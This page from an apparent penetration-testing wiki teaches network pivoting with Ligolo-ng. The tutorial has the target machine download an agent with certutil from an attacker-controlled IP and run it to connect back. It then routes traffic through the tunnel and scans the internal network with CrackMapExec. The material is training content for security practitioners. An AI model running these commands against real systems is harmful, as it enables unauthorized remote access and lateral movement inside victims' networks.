Zero Day Archives
  • What is Zero Day Archives?
  • Contributors
  • Wireless Security
    • Intro to WiFi Pentesting
      • WEP Networks
      • WPS
      • WPA-PSK Networks
      • WPA & WPA2 PSK
      • WPA2 & WPA3 Enterprise Networks
      • WPA2 & WPA3-APLess
  • Reverse Engineering
    • Reverse Engineering
      • Introduction to Software Reverse Engineering
        • Introduction to Capture the Flag (CTF) Competitions
        • What are PE & Elf Binaries
        • Assembly Language for Beginner Reverse Engineers
        • Memory Registers for x86-64 (64-bit) and x86 (32-bit)
        • Reversing Tools: Command-Line Utilities for Binary Analysis
        • Reversing ELF Binaries: Techniques and Tools
      • Disassembly & Debugging
        • GDB for Reverse Engineering
        • RADARE2 for Reverse Engineering
        • GHIDRA for Reverse Engineering
        • IDA Pro for Reverse Engineering
      • Binary Exploitation
        • Buffer Overflows
          • What are Buffer Overflows and Stack Protections?
          • Commonly Exploited C Functions and Their Secure Alternatives
          • Basic Buffer Overflow in x86-64 Using GDB
        • Cryptography
          • Understanding Ciphers and Identifying Common Patterns
          • Teaching XOR Operations in Binary Exploitation
        • Return Oriented Programming (ROP)
          • Practical Guide to Exploring and Identifying Return-Oriented Programming (ROP)
        • Cracking and Patching Binaries
          • Tactics, Tools, and Procedures for Cracking and Patching Binaries
        • Ret2Win Challenges
  • Malware Analysis
    • Malware Analysis
      • Static Analysis
  • Transporting Files to/from Victims
    • Transferring Files to/from High Value Targets
      • Linux
      • Windows
      • CrackMapExec (NetExec)
  • Penetration Testing against GIT Remote Repositories
    • Targeting GIT Repositories
      • Attacking GIT
  • Network Pivoting, Port Forwarding, and Tunneling
    • Pivoting
      • Ligolo-ng
        • Basic Pivoting
        • Setup Reverse Shells through Pivot
        • Transferring Files through Pivot
      • Pivoting: Using Remote Desktop
      • ProxyChains
      • Metasploit
    • SSH Tunneling
      • SSH Local Port Forwarding
      • SSH Dynamic Port Forwarding
      • Sshuttle over SSH
    • Port Fowarding
      • Chisel Port Forwarding
      • NetSH for Port Forwarding
      • Plink for Port Forwarding
      • SoCat
      • Metasploit: Port Forwarding
  • Anti-Virus Evasion
    • Anti-Virus Evasion
      • Evasion with Metasploit
      • Evasion wtih Shellter
      • Evasion with Virus Total
  • Public Exploit Research
    • Online Exploit Research & Methods
  • Password Attacks
    • Password Attacks
      • Identifying Hashes
        • Hash Identifier Tools
      • John The Ripper
        • Cracking Passwords with John
        • Convert to Hashes with John
        • NTLM vs NTLMv2 Hashes + CrackMapExec
      • Hashcat
        • Cracking Passwords with Hashcat
      • Hydra
        • Hydra for Network Services
        • Hydra for Web Services
      • Mutating Wordlists for John & Hashcat
        • Mutating Wordlists
  • Digital Forensics & Incident Response (DFIR)
    • Digital Forensics
  • Data Science
    • Data Science/AI
  • Software Defined Radio (SDR)
    • Software Defined Radio
  • Embedded Systems Programming
    • Field Programmable Gate Arrays (FPGAs)
  • Other Resources
    • Resources for Hackers
Powered by GitBook
On this page
  1. Network Pivoting, Port Forwarding, and Tunneling
  2. Pivoting
  3. Ligolo-ng

Basic Pivoting

Basic Pivoting with Ligolo-ng

Source:

https://github.com/nicocha30/ligolo-ng

Releases:

https://github.com/nicocha30/ligolo-ng/releases

Step 1: Install Ligolo-ng

  1. Download and Unzip Ligolo-ng: Follow the instructions from the Ligolo-ng GitHub repository to download and unzip the contents.

Step 2: Set Up the Interface

To create the interface for pivoting, you need to add a new TUN/TAP interface and bring it up.

  1. Delete Old Interfaces (if any):

    ip route list
route del -net 10.0.0.0/24

  2. Add a New Interface:

    ip tuntap add user root mode tun ligolo
ip link set ligolo up

    This creates the interface ligolo to route traffic through the tunnel.

Step 3: Get Help with Ligolo-ng

You can always get help or view available options by running:

./proxy -h

Step 4: Start the Proxy Server (Listening)

Start the proxy server with the self-cert option, which will listen for incoming connections:

./proxy -selfcert

Step 5: Move the Agent to the Target Machine

  1. On the target machine, use the following command to download the agent:

    certutil -urlcache -f http://192.168.45.241/agent.exe agent.exe

  2. Once the agent is downloaded, run it with the following command:

    .\agent.exe -connect 192.168.45.241:11601 -ignore-cert

    Here, you are connecting back to your Kali machine. Note: We're using a self-signed certificate, which is why the -ignore-cert option is included.

Step 6: View and Interact with Sessions

To view the active sessions, run the following in the terminal:

sessions

Choose the session by typing its number, for example, '1'. Once you are in the session, run:

ifconfig

This command shows the interfaces on the target machine, including the internal network machine, like 10.10.86.141/24.

Step 7: Add Routing to the Pivoting Interface

To route traffic through the tunnel (pivot), you need to add the target network to your routing table.

  1. Add a Route to access the internal network:

    ip route add 10.10.86.0/24 dev ligolo

  2. Verify the Route:

    You can check if Ligolo has added the route properly with:

    ip route list

Step 8: Final Step - Start the Pivoting Session

Now that the route is added, go back to your proxy server, ensure you're in the correct session, and start the proxy.

  1. Select Session:

    Choose the correct session by typing the number (e.g., '1').

    session

  2. Start Pivoting:

    Run the start command to begin the pivot.

    start

Step 9: Verify the Pivoting Setup

Now that the pivot is active, you can verify access to the internal network by using CrackMapExec to check if the internal machines are resolvable.

crackmapexec smb 10.10.86.0/24

If CrackMapExec can resolve the internal machines, the pivot is successful, and you now have access to the internal network.

PreviousLigolo-ngNextSetup Reverse Shells through Pivot

Last updated 19 days ago